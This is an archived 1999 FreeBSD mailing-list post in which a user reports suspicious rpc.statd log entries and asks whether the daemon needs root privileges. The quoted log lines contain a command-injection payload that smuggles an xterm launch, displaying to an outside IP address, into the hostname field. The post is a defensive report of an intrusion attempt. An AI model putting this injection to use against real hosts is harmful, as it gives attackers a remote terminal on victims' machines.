Date: Sun, 21 Feb 1999 14:12:43 +1030 From: Greg Lehey <grog@lemis.com> To: FreeBSD Hackers <hackers@freebsd.org>, FreeBSD-isp@freebsd.org Subject: New breakin technique? Message-ID: <19990221141243.G93492@lemis.com>
next in thread | raw e-mail | index | archive | help
I've just found the following messages in my logs: Feb 21 10:13:11 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0 Feb 21 10:13:14 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0 Feb 21 13:41:55 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.82:0; Has anybody seen something like this? It looks as if somebody is trying to break in, but I didn't know that rpc.statd could start xterms. Under these circumstances, it would be interesting to know if rpc.statd *must* run as root. Wouldn't, say, bin be enough? Greg -- See complete headers for address, home page and phone numbers finger grog@lemis.com for PGP public key To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-hackers" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?19990221141243.G93492>